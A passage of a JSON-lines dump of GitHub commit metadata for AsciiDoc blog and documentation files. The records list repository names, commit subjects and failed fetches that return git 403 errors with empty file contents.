wani\/prateekjadhwani.github.io,minicz\/minicz.github.io,OctavioMaia\/octaviomaia.github.io,matthiaselzinga\/matthiaselzinga.github.io,hbbalfred\/hbbalfred.github.io,carlomorelli\/carlomorelli.github.io,xvin3t\/xvin3t.github.io,anwfr\/blog.anw.fr,gardenias\/sddb.com,peter-lawrey\/peter-lawrey.github.io,Dhuck\/dhuck.github.io,Desarrollo-FullStack\/Desarrollo-FullStack.github.io,Rackcore\/Rackcore.github.io,iveskins\/iveskins.github.io,Le6ow5k1\/le6ow5k1.github.io,alexandrev\/alexandrev.github.io,txemis\/txemis.github.io,NationalShowcase2016CentralMichigan\/nationalshowcase2016cm.github.io,KurtStam\/kurtstam.github.io,tr00per\/tr00per.github.io,rohithkrajan\/rohithkrajan.github.io,zouftou\/zouftou.github.io,doochik\/doochik.github.io,henryouly\/henryouly.github.io,minicz\/minicz.github.io,xurei\/xurei.github.io,gquintana\/gquintana.github.io,NadineLaCuisine\/NadineLaCuisine.github.io,minditech\/minditech.github.io,raytong82\/raytong82.github.io,cmolitor\/blog,codechunks\/codechunks.github.io,jlboes\/jlboes.github.io,thykka\/thykka.github.io,icthieves\/icthieves.github.io,Nekothrace\/nekothrace.github.io,naru0504\/hubpress.io,vvani06\/hubpress-test,TsungmingLiu\/tsungmingliu
.github.io,mattbarton\/mattbarton.github.io,Lh4cKg\/Lh4cKg.github.io,eyalpost\/eyalpost.github.io,randhson\/Blog,apalkoff\/apalkoff.github.io,yejodido\/hubpress.io,dvmoomoodv\/hubpress.io,mattpearson\/mattpearson.github.io,mahrocks\/mahrocks.github.io,Mynor-Briones\/mynor-briones.github.io,murilo140891\/murilo140891.github.io,never-ask-never-know\/never-ask-never-know.github.io,kzmenet\/kzmenet.github.io,alchapone\/alchapone.github.io,netrunnerX\/netrunnerx.github.io,dannylane\/dannylane.github.io,txemis\/txemis.github.io,carlosdominguezmartin\/carlosdominguezmartin.github.io,TeksInHelsinki\/TeksInHelsinki.github.io,LenguajesdeProgramacion-AlonsoCampos\/LenguajesdeProgramacion-AlonsoCampos.github.io,blogforfun\/blogforfun.github.io,Mentaxification\/Mentaxification.github.io,nectia-think\/nectia-think.github.io,lerzegov\/lerzegov.github.io,jabby\/jabby.github.io,mouseguests\/mouseguests.github.io,velo\/velo.github.io,mhmtbsbyndr\/mhmtbsbyndr.github.io,johnkellden\/github.io,demo-hubpress\/demo,sidmusa\/sidmusa.github.io,iwakuralai-n\/badgame-site,blahcadepodcast\/blahcadepodcast.github.io,fqure\/fqure.github.io,coder-ze\/coder-ze.github.io,laura-arreola\/laura-arreola.github.io,silviu\/silviu.github.io,jankolorenc\/jankolorenc.github.io,pavistalli\/pavistalli.github.io,thockenb\/thockenb.github.io,nullbase\/nullbase.github.io,kay\/kay.github.io,sskorol\/sskorol.github.io,warpcoil\/warpcoil.github.io,der3k\/der3k.github.io,atfd\/hubpress.io,heliomsolivas\/heliomsolivas.github.io,luzhox\/mejorandola.github.io,icthieves\/icthieves.github.io,milantracy\/milantracy.github.io,skeate\/skeate.github.io,coder-ze\/coder-ze.github.io,kreids\/kreids.github.io,triskell\/triskell.github.io,mager19\/mager19.github.io,ovo-6\/ovo-6.github.io,wols\/time,spikebachman\/spikebachman.github.io,jelitox\/jelitox.github.io,mazongo\/mazongo.github.io,hapee\/hapee.github.io,quangpc\/quangpc.github.io,iwakuralai-n\/badgame-site,scottellis64\/scottellis64.github.io,DominikVogel\/DominikVogel.github.io,noahrc\/noahrc.github.io,IdoramNaed\/idoramnaed.github.io,lifengchuan2008\/lifengchuan2008.github.io,gruenberg\/gruenberg.github.io,chaseey\/chaseey.github.io,mozillahonduras\/mozillahonduras.github.io,vba\/vba.github.io,javathought\/javathought.github.io,caseyy\/caseyy.github.io,martinteslastein\/martinteslastein.github.io,ricardozanini\/ricardozanini.github.io,neurodiversitas\/neurodiversitas.github.io,pwlprg\/pwlprg.github.io,JithinPavithran\/JithinPavithran.github.io,wattsap\/wattsap.github.io,osada9000\/osada9000.github.io,amuhle\/amuhle.github.io,ilyaeck\/ilyaeck.github.io,AlonsoCampos\/AlonsoCampos.github.io,elenampva\/elenampva.github.io,willnewby\/willnewby.github.io,scriptindex\/scriptindex.github.io,SBozhko\/sbozhko.github.io,xumr0x\/xumr0x.github.io,MattBlog\/mattblog.github.io,everydaynormalgeek\/everydaynormalgeek.github.io,qu85101522\/qu85101522.github.io,anshu92\/blog,TeksInHelsinki\/TeksInHelsinki.github.io,sidemachine\/sidemachine.github.io,pamasse\/pamasse.github.io,KurtStam\/kurtstam.github.io,saptaksen\/saptaksen.github.io,LearningTools\/LearningTools.github.io,TheGertproject\/TheGertproject.github.io,ElteHupkes\/eltehupkes.github.io,in2erval\/in2erval.github.io,Cnlouds\/cnlouds.github.io,14FRS851\/14FRS851.github.io,rlebron88\/rlebron88.github.io,silviu\/silviu.github.io,seatones\/seatones.github.io,scottellis64\/scottellis64.github.io,FSUgenomics\/hubpress.io,macchandev\/macchandev.github.io,yahussain\/yahussain.github.io,jkschneider\/jkschneider.github.io,BulutKAYA\/bulutkaya.github.io,jarbro\/jarbr
o.github.io,topicusonderwijs\/topicusonderwijs.github.io,cringler\/cringler.github.io,kimkha-blog\/kimkha-blog.github.io,akoskovacsblog\/akoskovacsblog.github.io,jaganz\/jaganz.github.io,creative-coding-bonn\/creative-coding-bonn.github.io,Wurser\/wurser.github.io,mikealdo\/mikealdo.github.io,miroque\/shirokuma,neomobil\/neomobil.github.io,polarbill\/polarbill.github.io,zakkum42\/zakkum42.github.io,pysaumont\/pysaumont.github.io,plaidshirtguy\/plaidshirtguy.github.io,geummo\/geummo.github.io,Astalaseven\/astalaseven.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,furcon\/furcon.github.io,modmaker\/modmaker.github.io,faldah\/faldah.github.io,bluenergy\/bluenergy.github.io,jblemee\/jblemee.github.io,TunnyTraffic\/gh-hosting,dingboopt\/dingboopt.github.io,crotel\/crotel.github.com,studiocardo\/studiocardo.github.io,pdudits\/pdudits.github.io,fr-developer\/fr-developer.github.io,pysaumont\/pysaumont.github.io,metasean\/blog,heberqc\/heberqc.github.io,arthurmolina\/arthurmolina.github.io,thomaszahr\/thomaszahr.github.io,RandomWebCrap\/randomwebcrap.github.io,IdeaThoughtStream\/IdeaThoughtStream.github.io.old2,FRC125\/FRC125.github.io,jia1miao\/jia1miao.github.io,xvin3t\/xvin3t.github.io,kosssi\/blog,jivank\/jivank.github.io,fr-developer\/fr-developer.github.io,duarte-fonseca\/duarte-fonseca.github.io,acristyy\/acristyy.github.io,tkountis\/tkountis.github.io,flipswitchingmonkey\/flipswitchingmonkey.github.io,Aferide\/Aferide.github.io,kai-cn\/kai-cn.github.io,sidemachine\/sidemachine.github.io,sebbrousse\/sebbrousse.github.io,realraindust\/realraindust.github.io,costalfy\/costalfy.github.io,chakbun\/chakbun.github.io,xumr0x\/xumr0x.github.io,xvin3t\/xvin3t.github.io,gudhakesa\/gudhakesa.github.io,maurodx\/maurodx.github.io,ghostbind\/ghostbind.github.io,kunicmarko20\/kunicmarko20.github.io,datumrich\/datumrich.github.io,qeist\/qeist.github.io,xavierdono\/xavierdono.github.io,Aerodactyl\/aerodactyl.github.io,thezorgan\/thezorgan.github.io,codingkapoor\/codingkapoor.github.io,matthewbadeau\/matthewbadeau.github.io,deivisk\/deivisk.github.io,zakkum42\/zakkum42.github.io,mahrocks\/mahrocks.github.io,preteritoimperfecto\/preteritoimperfecto.github.io,Akanoa\/akanoa.github.io,kai-cn\/kai-cn.github.io,topicusonderwijs\/topicusonderwijs.github.io,yejodido\/hubpress.io,uzuyh\/hubpress.io,mattdoesinfosec\/mattdoesinfosec.github.io,Andy4Craft\/andy4craft.github.io,s-f-ek971\/s-f-ek971.github.io,IdoramNaed\/idoramnaed.github.io,dvmoomoodv\/hubpress.io,scriptindex\/scriptindex.github.io,jarbro\/jarbro.github.io,MichaelIT\/MichaelIT.github.io,jarbro\/jarbro.github.io,bithunshal\/shalsblog,oppemism\/oppemism.github.io,ntfnd\/ntfnd.github.io,Easter-Egg\/Easter-Egg.github.io,kubevirt\/blog,ghostbind\/ghostbind.github.io,s-f-ek971\/s-f-ek971.github.io,Adyrhan\/adyrhan.github.io,hhimanshu\/hhimanshu.github.io,uzuyh\/hubpress.io,live-smart\/live-smart.github.io,murilo140891\/murilo140891.github.io,tjfy1992\/tjfy1992.github.io,ennerf\/ennerf.github.io,Bachaco-ve\/bachaco-ve.github.io,unay-cilamega\/unay-cilamega.github.io,rage5474\/rage5474.github.io,bitcowboy\/bitcowboy.github.io,darsto\/darsto.github.io,oppemism\/oppemism.github.io,puzzles-engineer\/puzzles-engineer.github.io,Driven-Development\/Driven-Development.github.io,SBozhko\/sbozhko.github.io,nbourdin\/nbourdin.github.io,carlomorelli\/carlomorelli.github.io,2wce\/2wce.github.io,fbiville\/fbiville.github.io,Nekothrace\/nekothrace.github.io,stevenxzhou\/alex1007.github.io,nanox77\/nanox77.github.io,never-ask-never-know\/never-ask-never-know.github.io,fbivill
e\/fbiville.github.io,bencekiraly\/bencekiraly.github.io,mikealdo\/mikealdo.github.io,hutchr\/hutchr.github.io,MartinAhrer\/martinahrer.github.io,esbrannon\/esbrannon.github.io,AppHat\/AppHat.github.io,hami-jp\/hami-jp.github.io,birvajoshi\/birvajoshi.github.io,lyqiangmny\/lyqiangmny.github.io,Andy4Craft\/andy4craft.github.io,henning-me\/henning-me.github.io,jelitox\/jelitox.github.io,elvarb\/elvarb.github.io,qeist\/qeist.github.io,blater\/blater.github.io,hfluz\/hfluz.github.io,CBSti\/CBSti.github.io,FRC125\/FRC125.github.io,nanox77\/nanox77.github.io,diogoan\/diogoan.github.io,zakkum42\/zakkum42.github.io,lyqiangmny\/lyqiangmny.github.io,txemis\/txemis.github.io,vvani06\/hubpress-test,dakeshi\/dakeshi.github.io,Ugotsta\/Ugotsta.github.io,codingkapoor\/codingkapoor.github.io,lxjk\/lxjk.github.io,caglarsayin\/hubpress,lifengchuan2008\/lifengchuan2008.github.io,hitamutable\/hitamutable.github.io,unay-cilamega\/unay-cilamega.github.io,rizalp\/rizalp.github.io,live-smart\/live-smart.github.io,pdudits\/pdudits.github.io,mattburnin\/hubpress.io,wanjee\/wanjee.github.io,cloudmind7\/cloudmind7.github.com,jaredmorgs\/jaredmorgs.github.io,vvani06\/hubpress-test,juliardi\/juliardi.github.io,IdeaThoughtStream\/IdeaThoughtStream.github.io.old2,Dhuck\/dhuck.github.io,spe\/spe.github.io.hubpress,javathought\/javathought.github.io,msravi\/msravi.github.io,nickwanhere\/nickwanhere.github.io,rushil-patel\/rushil-patel.github.io,willyb321\/willyb321.github.io,seatones\/seatones.github.io,pallewela\/pallewela.github.io,yysk\/yysk.github.io,pamasse\/pamasse.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io,xavierdono\/xavierdono.github.io,acien101\/acien101.github.io,jbutzprojects\/jbutzprojects.github.io,ylliac\/ylliac.github.io,blackgun\/blackgun.github.io,TunnyTraffic\/gh-hosting,psicrest\/psicrest.github.io,FRC125\/FRC125.github.io,iwangkai\/iwangkai.github.io,iwangkai\/iwangkai.github.io,srevereault\/srevereault.github.io,iolabailey\/iolabailey.github.io,anggadjava\/anggadjava.github.io,thiderman\/daenney.github.io,mattpearson\/mattpearson.github.io,bahamoth\/bahamoth.github.io,tedroeloffzen\/tedroeloffzen.github.io,raloliver\/raloliver.github.io,epayet\/blog,amodig\/amodig.github.io,wanjee\/wanjee.github.io,raytong82\/raytong82.github.io,emilio2hd\/emilio2hd.github.io,YvonneZhang\/yvonnezhang.github.io,tofusoul\/tofusoul.github.io,daemotron\/daemotron.github.io,chrizco\/chrizco.github.io,karcot\/trial1,Ardemius\/ardemius.github.io,psicrest\/psicrest.github.io,railsdev\/railsdev.github.io,rushil-patel\/rushil-patel.github.io,PauloMoekotte\/PauloMoekotte.github.io,flipswitchingmonkey\/flipswitchingmonkey.github.io,kfkelvinng\/kfkelvinng.github.io,iveskins\/iveskins.github.io,RaphaelSparK\/RaphaelSparK.github.io,glitched01\/glitched01.github.io,3991\/3991.github.io,murilo140891\/murilo140891.github.io,adler-j\/adler-j.github.io,AgustinQuetto\/AgustinQuetto.github.io,nobodysplace\/nobodysplace.github.io,IndianLibertarians\/indianlibertarians.github.io,GDGSriLanka\/blog,chris1234p\/chris1234p.github.io,tedroeloffzen\/tedroeloffzen.github.io,chaseey\/chaseey.github.io,ovo-6\/ovo-6.github.io,Astalaseven\/astalaseven.github.io,bluenergy\/bluenergy.github.io,vs4vijay\/vs4vijay.github.io,nnn-dev\/nnn-dev.github.io,vba\/vba.github.io,theofilis\/theofilis.github.io,modmaker\/modmaker.github.io,theofilis\/theofilis.github.io,joao-bjsoftware\/joao-bjsoftware.github.io,xmichaelx\/xmichaelx.github.io,willyb321\/willyb321.github.io,sfoubert\/sfoubert.github.io,therebelrobot\/blog-n.ode.rocks,nnn-dev\/nnn-dev.github.io,Motsai\
/old-repo-to-mirror,mnishihan\/mnishihan.github.io,eyalpost\/eyalpost.github.io,ashelle\/ashelle.github.io,acristyy\/acristyy.github.io,mazongo\/mazongo.github.io,raditv\/raditv.github.io,niole\/niole.github.io,stratdi\/stratdi.github.io,acristyy\/acristyy.github.io,fgracia\/fgracia.github.io,TeksInHelsinki\/TeksInHelsinki.github.io,kay\/kay.github.io,cncgl\/cncgl.github.io,alexgaspard\/alexgaspard.github.io,amodig\/amodig.github.io,raytong82\/raytong82.github.io,hildjj\/hildjj.github.io,introspectively\/introspectively.github.io,carsnwd\/carsnwd.github.io,jia1miao\/jia1miao.github.io,xumr0x\/xumr0x.github.io,chris1234p\/chris1234p.github.io,FSUgenomics\/hubpress.io,fuhrerscene\/fuhrerscene.github.io,wheeliz\/tech-blog,uzuyh\/hubpress.io,lovian\/lovian.github.io,gajumaru4444\/gajumaru4444.github.io,lovian\/lovian.github.io,havvazaman\/havvazaman.github.io,elenampva\/elenampva.github.io,gudhakesa\/gudhakesa.github.io,markfetherolf\/markfetherolf.github.io,RandomWebCrap\/randomwebcrap.github.io,skeate\/skeate.github.io,n15002\/main,chaseconey\/chaseconey.github.io,fqure\/fqure.github.io,willyb321\/willyb321.github.io,masonc15\/masonc15.github.io,pzmarzly\/pzmarzly.github.io,ktekbiyikiletisim\/ktekbiyikiletisim.github.io,Vtek\/vtek.github.io,codechunks\/codechunks.github.io,emilio2hd\/emilio2hd.github.io,hbbalfred\/hbbalfred.github.io,camilo28\/camilo28.github.io,anuragsingh31\/anuragsingh31.github.io,blogforfun\/blogforfun.github.io,timelf123\/timelf123.github.io,rohithkrajan\/rohithkrajan.github.io,rvegas\/rvegas.github.io,karcot\/trial1,theblankpages\/theblankpages.github.io,popurax\/popurax.github.io,conchitawurst\/conchitawurst.github.io,debbiezhu\/debbiezhu.github.io,ThomasLT\/thomaslt.github.io,nikogamulin\/nikogamulin.github.io,locnh\/locnh.github.io,lucasferraro\/lucasferraro.github.io,chdask\/chdask.github.io,mmhchan\/mmhchan.github.io,KozytyPress\/kozytypress.github.io,gsera\/gsera.github.io,wattsap\/wattsap.github.io,pysaumont\/pysaumont.github.io,conchitawurst\/conchitawurst.github.io,foxsofter\/hubpress.io,qeist\/qeist.github.io,alphaskade\/alphaskade.github.io,pysysops\/pysysops.github.io,mozillahonduras\/mozillahonduras.github.io,MatanRubin\/MatanRubin.github.io,rdspring1\/rdspring1.github.io,imukulsharma\/imukulsharma.github.io,kreids\/kreids.github.io,Fendi-project\/fendi-project.github.io,ferandec\/ferandec.github.io,mnishihan\/mnishihan.github.io,railsdev\/railsdev.github.io,bahamoth\/bahamoth.github.io,jbroszat\/jbroszat.github.io,fadlee\/fadlee.github.io,Roen00\/roen00.github.io,cothan\/cothan.github.io,kimkha-blog\/kimkha-blog.github.io,crimarde\/crimarde.github.io,backemulus\/backemulus.github.io,Brandywine2161\/hubpress.io,frenchduff\/frenchduff.github.io,srevereault\/srevereault.github.io,atfd\/hubpress.io,mastersk3\/hubpress.io,siarlex\/siarlex.github.io,emilio2hd\/emilio2hd.github.io,yahussain\/yahussain.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,yaks-all-the-way-down\/yaks-all-the-way-down.github.io,abien\/abien.github.io,fasigpt\/fasigpt.github.io,mager19\/mager19.github.io,acien101\/acien101.github.io,hitamutable\/hitamutable.github.io,sskorol\/sskorol.github.io,YannBertrand\/yannbertrand.github.io,topranks\/topranks.github.io,ronanki\/ronanki.github.io,quentindemolliens\/quentindemolliens.github.io,mnishihan\/mnishihan.github.io,SRTjiawei\/SRTjiawei.github.io,gruenberg\/gruenberg.github.io,marioandres\/marioandres.github.io,tomas\/tomas.github.io,lerzegov\/lerzegov.github.io,markfetherolf\/markfetherolf.github.io,juliardi\/juliardi.gi
thub.io,raisedadead\/hubpress.io,ahopkins\/amhopkins.com,fasigpt\/fasigpt.github.io,ghostbind\/ghostbind.github.io,willnewby\/willnewby.github.io,msravi\/msravi.github.io,mozillahonduras\/mozillahonduras.github.io,Murazaki\/murazaki.github.io,jelitox\/jelitox.github.io,mikaman\/mikaman.github.io,KozytyPress\/kozytypress.github.io,marchelo2212\/marchelo2212.github.io,johannewinwood\/johannewinwood.github.io,TinkeringAlways\/tinkeringalways.github.io,peter-lawrey\/peter-lawrey.github.io,chris1234p\/chris1234p.github.io,carlosdelfino\/carlosdelfino-hubpress,jkamke\/jkamke.github.io,mkaptein172\/mkaptein172.github.io,Le6ow5k1\/le6ow5k1.github.io,3991\/3991.github.io,reggert\/reggert.github.io,metasean\/hubpress.io,cdelmas\/cdelmas.github.io,kubevirt\/blog,sskorol\/sskorol.github.io,blitzopteron\/ApesInc,thomasgwills\/thomasgwills.github.io,B3H1NDu\/b3h1ndu.github.io,bitcowboy\/bitcowboy.github.io,jrhea\/jrhea.github.io,amuhle\/amuhle.github.io,fadlee\/fadlee.github.io,yahussain\/yahussain.github.io,maurodx\/maurodx.github.io,vanpelt\/vanpelt.github.io,evolgenomology\/evolgenomology.github.io,NationalShowcase2016CentralMichigan\/nationalshowcase2016cm.github.io,holtalanm\/holtalanm.github.io,txemis\/txemis.github.io,gardenias\/sddb.com,xquery\/xquery.github.io,Aferide\/Aferide.github.io,mkaptein172\/mkaptein172.github.io,jaganz\/jaganz.github.io,pysaumont\/pysaumont.github.io,roelvs\/roelvs.github.io,prateekjadhwani\/prateekjadhwani.github.io,carlosdominguezmartin\/carlosdominguezmartin.github.io,metasean\/blog,tosun-si\/tosun-si.github.io,izziiyt\/izziiyt.github.io,jkschneider\/jkschneider.github.io,carsnwd\/carsnwd.github.io,twentyTwo\/twentyTwo.github.io,hoernschen\/hoernschen.github.io,ktekbiyikiletisim\/ktekbiyikiletisim.github.io,xavierdono\/xavierdono.github.io,fgracia\/fgracia.github.io,imukulsharma\/imukulsharma.github.io,jarcane\/jarcane.github.io,jonathandmoore\/jonathandmoore.github.io,AlonsoCampos\/AlonsoCampos.github.io,fadlee\/fadlee.github.io,dingboopt\/dingboopt.github.io,hotfloppy\/hotfloppy.github.io,joao-bjsoftware\/joao-bjsoftware.github.io,fuzzy-logic\/fuzzy-logic.github.io,hatohato25\/hatohato25.github.io,apalkoff\/apalkoff.github.io,IdoramNaed\/idoramnaed.github.io,jborichevskiy\/jborichevskiy.github.io,sidmusa\/sidmusa.github.io,furcon\/furcon.github.io,ovo-6\/ovo-6.github.io,heliomsolivas\/heliomsolivas.github.io,niole\/niole.github.io,Wurser\/wurser.github.io,livehua\/livehua.github.io,rballan\/rballan.github.io,B3H1NDu\/b3h1ndu.github.io,elvarb\/elvarb.github.io,mubix\/blog.room362.com","old_file":"README-ja.adoc","new_file":"README-ja.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/codingkapoor\/codingkapoor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3b685c50984d20d0de8bd41de31ed0be60bf9647","subject":"Delete README-pt.adoc","message":"Delete README-pt.adoc","repos":"gsha0\/hubpress.io,gsha0\/hubpress.io,gsha0\/hubpress.io,gsha0\/hubpress.io","old_file":"README-pt.adoc","new_file":"README-pt.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gsha0\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d7449cc8de5b784c770f1edc96e1587d428d9887","subject":"Update 2018-05-28-Swift-Firestore.adoc","message":"Update 
2018-05-28-Swift-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eb596fc76766750aacdaca70ac0ca42a4c70e03c","subject":"Fix license section","message":"Fix license section\n","repos":"LFUnion\/left,LFUnion\/left,LFUnion\/left,LFUnion\/left","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LFUnion\/left.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f6af2e4b6818dcaa2e5664ebce960747b28b2f4","subject":"Update 2015-10-15-Database-review.adoc","message":"Update 2015-10-15-Database-review.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-10-15-Database-review.adoc","new_file":"_posts\/2015-10-15-Database-review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"73c41471bb973a8bfb27249aee4beb6e35ea84d5","subject":"Deleted _posts\/2017-06-13-Making-a-change.adoc","message":"Deleted _posts\/2017-06-13-Making-a-change.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2017-06-13-Making-a-change.adoc","new_file":"_posts\/2017-06-13-Making-a-change.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d76a347ce914d1c2cdba5b18f14b43f02b30e31d","subject":"Update 2018-02-27-When-the-RTFM-sucks.adoc","message":"Update 2018-02-27-When-the-RTFM-sucks.adoc","repos":"costalfy\/costalfy.github.io,costalfy\/costalfy.github.io,costalfy\/costalfy.github.io,costalfy\/costalfy.github.io","old_file":"_posts\/2018-02-27-When-the-RTFM-sucks.adoc","new_file":"_posts\/2018-02-27-When-the-RTFM-sucks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/costalfy\/costalfy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"344b9a618e75bfa4407e126e4fef21447836015d","subject":"Blogpost about externalized secrets","message":"Blogpost about externalized secrets\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2019-12-13-externalized-secrets.adoc","new_file":"blog\/2019-12-13-externalized-secrets.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2a5f5280f7fae798cfaa4d68fa056471c374ec84","subject":"Update 2017-11-12-.adoc","message":"Update 
2017-11-12-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-12-.adoc","new_file":"_posts\/2017-11-12-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3744f7c22d27dd89a52dd3603b60c69ba584195c","subject":"Doc for Elytron Security JDBC","message":"Doc for Elytron Security JDBC\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/security-jdbc-guide.adoc","new_file":"docs\/src\/main\/asciidoc\/security-jdbc-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e9dfb2a215c2ed32a94913e05296005add5ffb98","subject":"Fix another simulate example in ingest docs","message":"Fix another simulate example in ingest docs\n\nWhen simulating an ingest pipeline against an existing pipeline, the\r\n_source field is required to wrap each doc. This commit fixes another\r\nexample in the docs that is missing this.\r\n \r\nRelates #25743, relates e3a0c11239c3923f876ecbb310346aadadf1d902\r\n","repos":"s1monw\/elasticsearch,pozhidaevak\/elasticsearch,Stacey-Gammon\/elasticsearch,coding0011\/elasticsearch,wangtuo\/elasticsearch,kalimatas\/elasticsearch,vroyer\/elasticassandra,scottsom\/elasticsearch,gfyoung\/elasticsearch,fred84\/elasticsearch,mjason3\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,wenpos\/elasticsearch,GlenRSmith\/elasticsearch,kalimatas\/elasticsearch,scottsom\/elasticsearch,jimczi\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,mjason3\/elasticsearch,mohit\/elasticsearch,robin13\/elasticsearch,maddin2016\/elasticsearch,s1monw\/elasticsearch,coding0011\/elasticsearch,rajanm\/elasticsearch,kalimatas\/elasticsearch,scottsom\/elasticsearch,lks21c\/elasticsearch,markwalkom\/elasticsearch,masaruh\/elasticsearch,markwalkom\/elasticsearch,wenpos\/elasticsearch,brandonkearby\/elasticsearch,strapdata\/elassandra,sneivandt\/elasticsearch,nknize\/elasticsearch,jimczi\/elasticsearch,gingerwizard\/elasticsearch,maddin2016\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,mjason3\/elasticsearch,HonzaKral\/elasticsearch,umeshdangat\/elasticsearch,GlenRSmith\/elasticsearch,wangtuo\/elasticsearch,uschindler\/elasticsearch,lks21c\/elasticsearch,masaruh\/elasticsearch,Stacey-Gammon\/elasticsearch,mjason3\/elasticsearch,scottsom\/elasticsearch,lks21c\/elasticsearch,scorpionvicky\/elasticsearch,vroyer\/elassandra,ThiagoGarciaAlves\/elasticsearch,masaruh\/elasticsearch,umeshdangat\/elasticsearch,nknize\/elasticsearch,pozhidaevak\/elasticsearch,sneivandt\/elasticsearch,vroyer\/elassandra,scorpionvicky\/elasticsearch,lks21c\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,strapdata\/elassandra,maddin2016\/elasticsearch,GlenRSmith\/elasticsearch,wangtuo\/elasticsearch,qwerty4030\/elasticsearch,shreejay\/elasticsearch,uschindler\/elasticsearch,markwalkom\/elasticsearch,gingerwizard\/elasticsearch,jimczi\/elasticsearch,fred84\/elasticsearch,maddin2016\/elasticsearch,umeshdangat\/elasticsearch,ThiagoGarciaAlves\/elasti
csearch,qwerty4030\/elasticsearch,gingerwizard\/elasticsearch,vroyer\/elasticassandra,qwerty4030\/elasticsearch,markwalkom\/elasticsearch,strapdata\/elassandra,s1monw\/elasticsearch,mohit\/elasticsearch,qwerty4030\/elasticsearch,robin13\/elasticsearch,vroyer\/elassandra,masaruh\/elasticsearch,shreejay\/elasticsearch,gingerwizard\/elasticsearch,qwerty4030\/elasticsearch,scottsom\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,wenpos\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,lks21c\/elasticsearch,maddin2016\/elasticsearch,Stacey-Gammon\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,wenpos\/elasticsearch,gfyoung\/elasticsearch,shreejay\/elasticsearch,kalimatas\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,pozhidaevak\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,pozhidaevak\/elasticsearch,fred84\/elasticsearch,HonzaKral\/elasticsearch,brandonkearby\/elasticsearch,wenpos\/elasticsearch,gfyoung\/elasticsearch,pozhidaevak\/elasticsearch,jimczi\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,shreejay\/elasticsearch,rajanm\/elasticsearch,kalimatas\/elasticsearch,scorpionvicky\/elasticsearch,s1monw\/elasticsearch,fred84\/elasticsearch,sneivandt\/elasticsearch,coding0011\/elasticsearch,mohit\/elasticsearch,uschindler\/elasticsearch,masaruh\/elasticsearch,wangtuo\/elasticsearch,s1monw\/elasticsearch,strapdata\/elassandra,nknize\/elasticsearch,fred84\/elasticsearch,sneivandt\/elasticsearch,gfyoung\/elasticsearch,strapdata\/elassandra,rajanm\/elasticsearch,jimczi\/elasticsearch,nknize\/elasticsearch,Stacey-Gammon\/elasticsearch,vroyer\/elasticassandra,rajanm\/elasticsearch,sneivandt\/elasticsearch,scorpionvicky\/elasticsearch,umeshdangat\/elasticsearch,shreejay\/elasticsearch,rajanm\/elasticsearch,brandonkearby\/elasticsearch,markwalkom\